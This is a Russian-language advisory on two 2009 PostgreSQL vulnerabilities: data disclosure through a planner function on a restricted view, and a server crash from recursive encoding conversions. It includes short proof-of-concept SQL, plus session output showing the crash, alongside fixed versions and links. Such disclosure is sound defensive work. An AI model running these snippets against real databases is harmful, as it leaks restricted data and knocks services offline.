Дата публикации: | 18.03.2009 |
Дата изменения: | 13.04.2009 |
Всего просмотров: | 2626 |
Опасность: | Низкая |
Наличие исправления: | Частично |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: |
Отказ в обслуживании Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
PostgreSQL 8.x
PostgreSQL 7.x |
Уязвимые версии: PostgreSQL версии до 7.4.25 PostgreSQL 8.3.6, возможно другие версии. Описание: 1. Уязвимость существует в планировщике при выполнении функций с низким приоритетом вместе с видами. Злоумышленник может с помощью специально сформированной функции просмотреть содержимое запрещенных для просмотра колонок. Пример: CREATE OR REPLACE FUNCTION do_tell(anyelement) SELECT * FROM restricted_view WHERE do_tell(secret_column); 2. Уязвимость существует из-за рекурсивной ошибки при конвертации кодировок. Злоумышленник может с помощью специально сформированного SQL запроса аварийно завершить работу приложения. Пример:test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM ascii_to_mic; CREATE CONVERSION test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM mic_to_ascii; CREATE CONVERSION test=# set client_encoding to 'LATIN1'; server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. URL производителя: www.postgresql.org Решение: Уязвимость #2 исправлена в версиях 8.3.7, 8.2.13, 8.1.17, 8.0.21 и 7.4.25. Способов устранения уязвимости не существует в настоящее время. Журнал изменений:
13.04.2009 |
|
Ссылки: |
http://archives.postgresql.org/pgsql-hackers/2009-02/msg00861.php http://archives.postgresql.org/pgsql-bugs/2009-02/msg00172.php |